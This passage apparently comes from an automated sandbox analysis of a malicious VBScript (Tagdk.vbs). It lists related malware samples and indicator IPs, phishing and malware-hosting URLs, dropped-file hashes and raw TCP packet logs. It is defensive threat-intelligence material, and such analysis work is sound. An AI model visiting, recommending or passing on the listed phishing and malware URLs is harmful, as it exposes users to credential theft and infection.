                                    INQ_No._HDPE-16-DD-005.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                    • 142.44.226.116
                                    rfq_purchase_order_catalog_design_no_TZ806_23102023_00000000_pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                    • 54.37.178.173
                                    rIMG-2023010_WAAa646737kendelsesordniGenicular.exeGet hashmaliciousGuLoader, RemcosBrowse
                                    • 54.37.178.173
                                    IMG-2023010_WAA646737kendelsesordniGenicular.exeGet hashmaliciousGuLoader, RemcosBrowse
                                    • 54.37.178.173

                                    JA3 Fingerprints

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    28a2c9bd18a11de089ef85a160da29e4https://www.bing.com/ck/a?!&&p=130cebb9aea6576aJmltdHM9MTY5ODE5MjAwMCZpZ3VpZD0zNjVkNTczZS0xMmUwLTYyMGQtM2MyYS00NDhiMTMxMTYzYzgmaW5zaWQ9NTE4Ng&ptn=3&hsh=3&fclid=365d573e-12e0-620d-3c2a-448b131163c8&u=a1aHR0cHM6Ly9jYW9kYW5neWR1b2NkYW5hbmcuZWR1LnZuL0JnUlhVQUlHVVZRSERnTU4&ntb=1Get hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                    • 142.251.167.100
                                    Re-Authenticate.msgGet hashmaliciousUnknownBrowse
                                    • 142.251.167.100
                                    a323b71c-60c4-c2b8-70af-29952ee317ae.emlGet hashmaliciousUnknownBrowse
                                    • 142.251.167.100
                                    http://185.49.71.27/Get hashmaliciousDarkTortilla, LummaC Stealer, RedLineBrowse
                                    • 142.251.167.100
                                    https://bruisecellar.s2-tastewp.com/post87687Get hashmaliciousUnknownBrowse
                                    • 142.251.167.100
                                    http://rum.browser-intake-foxbusiness.comGet hashmaliciousUnknownBrowse
                                    • 142.251.167.100
                                    https://www.vdtwv.site/loginGet hashmaliciousUnknownBrowse
                                    • 142.251.167.100
                                    https://stecmcommunnity.com/stearmcammuniityGet hashmaliciousUnknownBrowse
                                    • 142.251.167.100
                                    https://www.ctahjvf.cn/loginGet hashmaliciousUnknownBrowse
                                    • 142.251.167.100
                                    https://pub-3ef6d2942fc441659c2e93705c031e0f.r2.dev/bool.htmlGet hashmaliciousHTMLPhisherBrowse
                                    • 142.251.167.100
                                    http://www.tenhaobjetivo.com.br/wp-includes/pomo/a/Get hashmaliciousUnknownBrowse
                                    • 142.251.167.100
                                    https://viewsnet.sabuncuhan.com/Get hashmaliciousUnknownBrowse
                                    • 142.251.167.100
                                    https://www2.etc-meisai.jp.llshcpd.cn//msidecrt.php?sinvu7yfte=1Get hashmaliciousUnknownBrowse
                                    • 142.251.167.100
                                    https://www.mzdjn.site/loginGet hashmaliciousUnknownBrowse
                                    • 142.251.167.100
                                    https://objectstorage.eu-frankfurt-1.oraclecloud.com/n/frdtal0a81zt/b/367489493903puz35647389302/o/microsoftonline.htmGet hashmaliciousHTMLPhisherBrowse
                                    • 142.251.167.100
                                    ATT00001.htmGet hashmaliciousUnknownBrowse
                                    • 142.251.167.100
                                    https://www.bkajriy.cn/loginGet hashmaliciousUnknownBrowse
                                    • 142.251.167.100
                                    https://drive.google.com/file/d/1APmI4CJtwrBsL8sFklkcS6VdR7xajXatGet hashmaliciousUnknownBrowse
                                    • 142.251.167.100
                                    https://paneltechllc.com/DLqinIl/xmlamex/mux/amex.htmlGet hashmaliciousUnknownBrowse
                                    • 142.251.167.100
                                    https://objectstorage.eu-paris-1.oraclecloud.com/n/alnabil/b/0998st64783833/o/microsoftonline.htmGet hashmaliciousHTMLPhisherBrowse
                                    • 142.251.167.100
                                    37f463bf4616ecd445d4a1937da06e19TAS_#U63a1#U8cfc#U8a02#U55ae.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                    • 172.253.115.132
                                    • 142.251.167.100
                                    My arrival in hotel_patched.scrGet hashmaliciousVidarBrowse
                                    • 172.253.115.132
                                    • 142.251.167.100
                                    facture.WSFGet hashmaliciousUnknownBrowse
                                    • 172.253.115.132
                                    • 142.251.167.100
                                    TT-Copy_Rebound_Electronics_International_Services_DMCC.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                    • 172.253.115.132
                                    • 142.251.167.100
                                    P1028.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                    • 172.253.115.132
                                    • 142.251.167.100
                                    TVU_41-11_PL.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                    • 172.253.115.132
                                    • 142.251.167.100
                                    file.exeGet hashmaliciousUnknownBrowse
                                    • 172.253.115.132
                                    • 142.251.167.100
                                    file.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                    • 172.253.115.132
                                    • 142.251.167.100
                                    file.exeGet hashmaliciousGlupteba, LummaC Stealer, XmrigBrowse
                                    • 172.253.115.132
                                    • 142.251.167.100
                                    TR9840001-TRANS.DOC.exeGet hashmaliciousGuLoaderBrowse
                                    • 172.253.115.132
                                    • 142.251.167.100
                                    3ff3e11128ead9eca87a33ac9bc9453cb8450212c0a00.exeGet hashmaliciousGlupteba, LummaC Stealer, XmrigBrowse
                                    • 172.253.115.132
                                    • 142.251.167.100
                                    file.exeGet hashmaliciousGlupteba, LummaC Stealer, XmrigBrowse
                                    • 172.253.115.132
                                    • 142.251.167.100
                                    Proforma_Invoice_PO#4.exeGet hashmaliciousAgentTeslaBrowse
                                    • 172.253.115.132
                                    • 142.251.167.100
                                    PO-24103078_pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                    • 172.253.115.132
                                    • 142.251.167.100
                                    Wuerth_factura_4051226052.exeGet hashmaliciousGuLoaderBrowse
                                    • 172.253.115.132
                                    • 142.251.167.100
                                    Arrival_Notice.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                    • 172.253.115.132
                                    • 142.251.167.100
                                    RFQ20231024_Commercial_list_pdf.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                    • 172.253.115.132
                                    • 142.251.167.100
                                    gVhVoGZS8u.exeGet hashmaliciousGlupteba, LummaC Stealer, XmrigBrowse
                                    • 172.253.115.132
                                    • 142.251.167.100
                                    Ertesito_-_MEDIKLASTER_Kft.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                    • 172.253.115.132
                                    • 142.251.167.100
                                    7C72023000192.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                    • 172.253.115.132
                                    • 142.251.167.100

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):11914
                                    Entropy (8bit):4.896235276832004
                                    Encrypted:false
                                    SSDEEP:192:Ixoe5lpOdxoe56ib49Vsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9sa:WVib49+VoGIpN6KQkj2xkjh4iUxRcYK6
                                    MD5:96420197D195D4ABC60724F24234CACA
                                    SHA1:192ACD14552FB56B27AE0DD34B5B6DFCC6152B9B
                                    SHA-256:0DCE3F924E46FDA8B63D8DA386D20D70EAA0C4C528DD4032DF0D8702FDC1B91D
                                    SHA-512:14510349BB77CE85A5B2B2B3E934EA4A9F074F891A934299C9B839E7E16E271807B2814E780CD1A9862D5D1B1303E7C74DA89300C2CF655EB99DDAB82909680F
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):64
                                    Entropy (8bit):1.1940658735648508
                                    Encrypted:false
                                    SSDEEP:3:Nlllulbnolz:NllUc
                                    MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                    SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                    SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                    SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:@...e................................................@..........

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ep4rldrh.hbc.ps1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oek4ihkk.cyn.psm1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oxrah5uw.5u0.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ufikyduv.e2p.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    Static File Info

                                    General

                                    File type:ASCII text, with CRLF line terminators
                                    Entropy (8bit):5.234182366291093
                                    TrID:
                                      File name:Tagdk.vbs
                                      File size:18'429 bytes
                                      MD5:c99faf86e65b24343ffaebe5801ea155
                                      SHA1:b03430d210b299e6108861b9f1f87bd6716cfeaa
                                      SHA256:7af3bca67a5ae075acf74bdc961e596575a2f19f5e13907b25066ff6f5929ae8
                                      SHA512:9a5cdb04f0b2e108c52a0a44d1ef8c5a3873aee109581f2f38d65ffe628c183a344542fa8f4b68c4540856d36c2059ce25e50a28081814f2ae48a24c1924108b
                                      SSDEEP:384:BEvF/9+WX59YZvkpKlXzP0cnryXPcxeDCn4MkzjfELLW:BqF/rWMUlXgcnGXzC2zYLLW
                                      TLSH:3282FCDEE58519048B6929B3CC5346378EAA019EB37B0E3577BDE14C6603D2849BF7E0
                                      File Content Preview:....Private Const Canchalagua = &H841E..Private Const Clytemnestra = "Tydende Afgrelses"..Private Const Hostlers = 16251..Private Const Standers = &HFFFF7010..Private Const Moulds = "Tabularise Ragaer"..Private Const Precollection72 = &H47BB..Private Cons

                                      File Icon

                                      Icon Hash:68d69b8f86ab9a86

                                      Network Behavior

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 26, 2023 09:02:43.022372961 CEST49709443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:02:43.022486925 CEST44349709142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:02:43.022583961 CEST49709443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:02:43.025698900 CEST49709443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:02:43.025738955 CEST44349709142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:02:43.254426003 CEST44349709142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:02:43.254600048 CEST49709443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:02:43.255604029 CEST44349709142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:02:43.255691051 CEST49709443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:02:43.258487940 CEST49709443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:02:43.258498907 CEST44349709142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:02:43.258768082 CEST44349709142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:02:43.306236029 CEST49709443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:02:43.315306902 CEST49709443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:02:43.358457088 CEST44349709142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:02:43.893462896 CEST44349709142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:02:43.893548012 CEST44349709142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:02:43.893649101 CEST49709443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:02:43.893727064 CEST49709443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:02:43.893750906 CEST44349709142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:02:43.893762112 CEST49709443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:02:43.893769026 CEST44349709142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:02:44.559840918 CEST49711443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:02:44.559885979 CEST44349711142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:02:44.559967995 CEST49711443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:02:44.560241938 CEST49711443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:02:44.560261011 CEST44349711142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:02:44.774354935 CEST44349711142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:02:44.774816990 CEST49711443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:02:44.774830103 CEST44349711142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:02:44.775901079 CEST49711443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:02:44.775906086 CEST44349711142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:02:45.552556992 CEST44349711142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:02:45.552637100 CEST44349711142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:02:45.552700043 CEST49711443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:02:45.552894115 CEST49711443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:02:45.552921057 CEST44349711142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:02:45.552933931 CEST49711443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:02:45.552941084 CEST44349711142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:02:52.656384945 CEST49719443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:02:52.656414032 CEST44349719142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:02:52.656668901 CEST49719443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:02:52.656668901 CEST49719443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:02:52.656698942 CEST44349719142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:02:52.878499985 CEST44349719142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:02:52.879131079 CEST49719443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:02:52.879143953 CEST44349719142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:02:52.882868052 CEST49719443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:02:52.882874012 CEST44349719142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:02:53.583781958 CEST44349719142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:02:53.583982944 CEST44349719142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:02:53.584239006 CEST49719443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:02:53.584304094 CEST49719443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:02:53.584305048 CEST49719443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:02:53.584325075 CEST44349719142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:02:53.584335089 CEST44349719142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:02:54.108067989 CEST49721443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:02:54.108095884 CEST44349721142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:02:54.108158112 CEST49721443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:02:54.108464956 CEST49721443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:02:54.108479977 CEST44349721142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:02:54.330113888 CEST44349721142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:02:54.330748081 CEST49721443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:02:54.330760956 CEST44349721142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:02:54.331612110 CEST49721443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:02:54.331623077 CEST44349721142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:02:55.058356047 CEST44349721142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:02:55.058425903 CEST44349721142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:02:55.058495045 CEST49721443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:02:55.059314966 CEST49721443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:02:55.059314966 CEST49721443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:02:55.059329987 CEST44349721142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:02:55.059340000 CEST44349721142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:03:19.565370083 CEST49723443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:03:19.565404892 CEST44349723142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:03:19.565483093 CEST49723443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:03:19.571290016 CEST49723443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:03:19.571304083 CEST44349723142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:03:19.785773993 CEST44349723142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:03:19.785912991 CEST49723443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:03:19.786585093 CEST44349723142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:03:19.786653042 CEST49723443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:03:19.894354105 CEST49723443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:03:19.894370079 CEST44349723142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:03:19.894759893 CEST44349723142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:03:19.894820929 CEST49723443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:03:19.899107933 CEST49723443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:03:19.946470022 CEST44349723142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:03:20.479048967 CEST44349723142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:03:20.479120016 CEST44349723142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:03:20.479190111 CEST49723443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:03:20.479228973 CEST49723443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:03:20.479465008 CEST49723443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:03:20.479480028 CEST44349723142.251.167.100192.168.2.11
                                      Oct 26, 2023 09:03:20.479504108 CEST49723443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:03:20.479517937 CEST49723443192.168.2.11142.251.167.100
                                      Oct 26, 2023 09:03:20.581603050 CEST49724443192.168.2.11172.253.115.132
                                      Oct 26, 2023 09:03:20.581636906 CEST44349724172.253.115.132192.168.2.11
                                      Oct 26, 2023 09:03:20.581717968 CEST49724443192.168.2.11172.253.115.132
                                      Oct 26, 2023 09:03:20.582242012 CEST49724443192.168.2.11172.253.115.132
                                      Oct 26, 2023 09:03:20.582257986 CEST44349724172.253.115.132192.168.2.11
                                      Oct 26, 2023 09:03:20.787031889 CEST44349724172.253.115.132192.168.2.11
                                      Oct 26, 2023 09:03:20.787164927 CEST49724443192.168.2.11172.253.115.132
                                      Oct 26, 2023 09:03:20.787828922 CEST44349724172.253.115.132192.168.2.11
                                      Oct 26, 2023 09:03:20.787899017 CEST49724443192.168.2.11172.253.115.132
                                      Oct 26, 2023 09:03:20.792876959 CEST49724443192.168.2.11172.253.115.132
                                      Oct 26, 2023 09:03:20.792891026 CEST44349724172.253.115.132192.168.2.11
                                      Oct 26, 2023 09:03:20.793147087 CEST44349724172.253.115.132192.168.2.11
                                      Oct 26, 2023 09:03:20.793205976 CEST49724443192.168.2.11172.253.115.132
                                      Oct 26, 2023 09:03:20.793611050 CEST49724443192.168.2.11172.253.115.132
                                      Oct 26, 2023 09:03:20.838449001 CEST44349724172.253.115.132192.168.2.11
                                      Oct 26, 2023 09:03:21.074022055 CEST44349724172.253.115.132192.168.2.11
                                      Oct 26, 2023 09:03:21.074214935 CEST49724443192.168.2.11172.253.115.132
                                      Oct 26, 2023 09:03:21.074235916 CEST44349724172.253.115.132192.168.2.11
                                      Oct 26, 2023 09:03:21.074281931 CEST49724443192.168.2.11172.253.115.132
                                      Oct 26, 2023 09:03:21.087584972 CEST44349724172.253.115.132192.168.2.11
                                      Oct 26, 2023 09:03:21.087776899 CEST49724443192.168.2.11172.253.115.132
                                      Oct 26, 2023 09:03:21.101591110 CEST44349724172.253.115.132192.168.2.11
                                      Oct 26, 2023 09:03:21.101660013 CEST49724443192.168.2.11172.253.115.132
                                      Oct 26, 2023 09:03:21.108412981 CEST44349724172.253.115.132192.168.2.11
                                      Oct 26, 2023 09:03:21.108475924 CEST49724443192.168.2.11172.253.115.132
                                      Oct 26, 2023 09:03:21.115268946 CEST44349724172.253.115.132192.168.2.11
                                      Oct 26, 2023 09:03:21.115320921 CEST49724443192.168.2.11172.253.115.132
                                      Oct 26, 2023 09:03:21.115334988 CEST44349724172.253.115.132192.168.2.11
                                      Oct 26, 2023 09:03:21.115372896 CEST49724443192.168.2.11172.253.115.132
                                      Oct 26, 2023 09:03:21.122462034 CEST44349724172.253.115.132192.168.2.11
                                      Oct 26, 2023 09:03:21.122509003 CEST49724443192.168.2.11172.253.115.132
                                      Oct 26, 2023 09:03:21.122522116 CEST44349724172.253.115.132192.168.2.11
                                      Oct 26, 2023 09:03:21.122556925 CEST49724443192.168.2.11172.253.115.132
                                      Oct 26, 2023 09:03:21.169770002 CEST44349724172.253.115.132192.168.2.11
                                      Oct 26, 2023 09:03:21.169822931 CEST49724443192.168.2.11172.253.115.132
                                      Oct 26, 2023 09:03:21.169835091 CEST44349724172.253.115.132192.168.2.11
                                      Oct 26, 2023 09:03:21.169872999 CEST49724443192.168.2.11172.253.115.132
                                      Oct 26, 2023 09:03:21.173238993 CEST44349724172.253.115.132192.168.2.11
                                      Oct 26, 2023 09:03:21.173295975 CEST49724443192.168.2.11172.253.115.132
                                      Oct 26, 2023 09:03:21.173329115 CEST44349724172.253.115.132192.168.2.11
                                      Oct 26, 2023 09:03:21.173399925 CEST49724443192.168.2.11172.253.115.132
                                      Oct 26, 2023 09:03:21.180169106 CEST44349724172.253.115.132192.168.2.11
                                      Oct 26, 2023 09:03:21.180217981 CEST49724443192.168.2.11172.253.115.132
                                      Oct 26, 2023 09:03:21.180223942 CEST44349724172.253.115.132192.168.2.11
                                      Oct 26, 2023 09:03:21.180320024 CEST49724443192.168.2.11172.253.115.132
                                      Oct 26, 2023 09:03:21.187231064 CEST44349724172.253.115.132192.168.2.11
                                      Oct 26, 2023 09:03:21.187309027 CEST49724443192.168.2.11172.253.115.132
                                      Oct 26, 2023 09:03:21.187388897 CEST44349724172.253.115.132192.168.2.11
                                      Oct 26, 2023 09:03:21.187446117 CEST49724443192.168.2.11172.253.115.132
                                      Oct 26, 2023 09:03:21.194070101 CEST44349724172.253.115.132192.168.2.11
                                      Oct 26, 2023 09:03:21.194148064 CEST49724443192.168.2.11172.253.115.132
                                      Oct 26, 2023 09:03:21.194154978 CEST44349724172.253.115.132192.168.2.11
                                      Oct 26, 2023 09:03:21.194226980 CEST49724443192.168.2.11172.253.115.132
                                      Oct 26, 2023 09:03:21.201106071 CEST44349724172.253.115.132192.168.2.11
                                      Oct 26, 2023 09:03:21.201190948 CEST49724443192.168.2.11172.253.115.132
                                      Oct 26, 2023 09:03:21.201196909 CEST44349724172.253.115.132192.168.2.11
                                      Oct 26, 2023 09:03:21.201253891 CEST49724443192.168.2.11172.253.115.132
                                      Oct 26, 2023 09:03:21.207998991 CEST44349724172.253.115.132192.168.2.11
                                      Oct 26, 2023 09:03:21.208086967 CEST49724443192.168.2.11172.253.115.132
                                      Oct 26, 2023 09:03:21.208092928 CEST44349724172.253.115.132192.168.2.11
                                      Oct 26, 2023 09:03:21.208149910 CEST49724443192.168.2.11172.253.115.132
                                      Oct 26, 2023 09:03:21.214946032 CEST44349724172.253.115.132192.168.2.11
                                      Oct 26, 2023 09:03:21.215349913 CEST49724443192.168.2.11172.253.115.132
                                      Oct 26, 2023 09:03:21.215415001 CEST44349724172.253.115.132192.168.2.11
                                      Oct 26, 2023 09:03:21.215487957 CEST49724443192.168.2.11172.253.115.132
                                      Oct 26, 2023 09:03:21.221941948 CEST44349724172.253.115.132192.168.2.11
                                      Oct 26, 2023 09:03:21.222032070 CEST49724443192.168.2.11172.253.115.132
                                      Oct 26, 2023 09:03:21.225373030 CEST44349724172.253.115.132192.168.2.11
                                      Oct 26, 2023 09:03:21.225454092 CEST49724443192.168.2.11172.253.115.132
                                      Oct 26, 2023 09:03:21.225464106 CEST44349724172.253.115.132192.168.2.11
                                      Oct 26, 2023 09:03:21.225524902 CEST49724443192.168.2.11172.253.115.132
                                      Oct 26, 2023 09:03:21.232207060 CEST44349724172.253.115.132192.168.2.11
                                      Oct 26, 2023 09:03:21.232305050 CEST49724443192.168.2.11172.253.115.132
                                      Oct 26, 2023 09:03:21.232311010 CEST44349724172.253.115.132192.168.2.11
                                      Oct 26, 2023 09:03:21.232372999 CEST49724443192.168.2.11172.253.115.132
                                      Oct 26, 2023 09:03:21.238456964 CEST44349724172.253.115.132192.168.2.11
                                      Oct 26, 2023 09:03:21.238509893 CEST44349724172.253.115.132192.168.2.11
                                      Oct 26, 2023 09:03:21.238519907 CEST49724443192.168.2.11172.253.115.132
                                      Oct 26, 2023 09:03:21.238527060 CEST44349724172.253.115.132192.168.2.11
                                      Oct 26, 2023 09:03:21.238550901 CEST49724443192.168.2.11172.253.115.132
                                      Oct 26, 2023 09:03:21.238596916 CEST49724443192.168.2.11172.253.115.132
                                      Oct 26, 2023 09:03:21.244376898 CEST44349724172.253.115.132192.168.2.11
